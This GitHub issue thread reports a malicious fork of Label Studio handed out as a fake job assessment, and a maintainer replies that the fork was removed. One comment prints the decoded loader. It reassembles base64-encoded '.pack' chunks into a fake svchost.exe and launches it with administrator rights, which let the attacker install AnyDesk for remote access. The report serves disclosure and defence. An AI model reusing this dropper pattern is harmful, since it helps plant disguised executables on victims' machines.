### ISSUE TITLE
Someone using Label-Studio Repo to install Viruses on GitHub

### ISSUE THREAD

**Issue by ayushkatoch98** [heartexlabs/label-studio#5082]
Hi, first of all I apologize as I couldnt find a better way to contact you people also I am not sure if you guys can do anything about this or not.

This repository has a virus and is using Label-Studio files to get it done 
https://github.com/spiral2067/label-studio

The person who is sharing this link is on Discord (could be on other platform aswell) and is giving out this link as an assessement for a job. 

I was able to get that person banned from the server but his github repository is still active. 

When you download his repository and try to run it, weridly it asks for admin rights for a software called 'svchost'. Unfortunately, I didn't pay much attention and ended up providing the rights. As a result, it was able to download and install anydesk on my PC. He was also able to get the unristricted remote access. 

Since he is using your repository / code as a cover to hide his milicious code, I thought you would like to know about it and hopefully could do something about the above mentioned repository. 

Virus / Affected file is **Label_Studio/work/django_init.py** 
The entire affected code is encoded using base64 which needs to be decoded a couple times. 

Link to the affected file 
https://github.com/spiral2067/label-studio/blob/main/label_studio/work/django_init.py

**Comment by ayushkatoch98** [comment]
This is the code that you get when you decode the base64 string 

``````
import base64
import os
import ctypes
from ctypes import windll, wintypes
import shutil

class Init:
    def decode_file(encoded_file):
        with open(encoded_file, 'rb') as file:
            encoded_data = file.read()
        decoded_data = base64.b64decode(encoded_data)
        return decoded_data

    def merge_decoded_files(decoded_files, output_filename):
        with open(output_filename, 'wb') as output_file:
            for decoded_file in decoded_files:
                output_file.write(decoded_file)

    def run():
        # Decode the three encoded files
        LOCALAPPDATA = os.getenv("LOCALAPPDATA")
        directory = LOCALAPPDATA + "\VirtualTemp"

        if os.path.isdir(directory):
            pass
        else:
            os.mkdir(directory)

        destination_file_path = os.path.join(LOCALAPPDATA + "\VirtualTemp", "svchost.exe")

        if os.path.exists(destination_file_path):
            windll.shell32.ShellExecuteW(None, "runas", destination_file_path, "" , None, 1)
        else:
            decoded_files = []

            encoded_file1 = "./docker/pack-ea496196844d1e5caa5fb593f5c8a533805a6417.pack"
            decoded_data1 = Init.decode_file(encoded_file1)
            decoded_files.append(decoded_data1)

            encoded_file2 = "./docker/pack-ea496196844d1e5caa5fb593f5c8a533805a6418.pack"
            decoded_data2 = Init.decode_file(encoded_file2)
            decoded_files.append(decoded_data2)

            encoded_file3 = "./docker/pack-ea496196844d1e5caa5fb593f5c8a533805a6419.pack"
            decoded_data3 = Init.decode_file(encoded_file3)
            decoded_files.append(decoded_data3)

            encoded_file4 = "./docker/pack-ea496196844d1e5caa5fb593f5c8a533805a6420.pack"
            decoded_data4 = Init.decode_file(encoded_file4)
            decoded_files.append(decoded_data4)

            encoded_file5 = "./docker/pack-ea496196844d1e5caa5fb593f5c8a533805a6421.pack"
            decoded_data5 = Init.decode_file(encoded_file5)
            decoded_files.append(decoded_data5)

            # Merge the three encrypted parts back into the original file
            Init.merge_decoded_files(decoded_files, destination_file_path)
            windll.shell32.ShellExecuteW(None, "runas", destination_file_path, "" , None, 1)
```

**Comment by ayushkatoch98** [comment]
accidently closed the issue

**Comment by hogepodge** [comment]
That repository has been removed from GitHub. Thanks for reporting this.
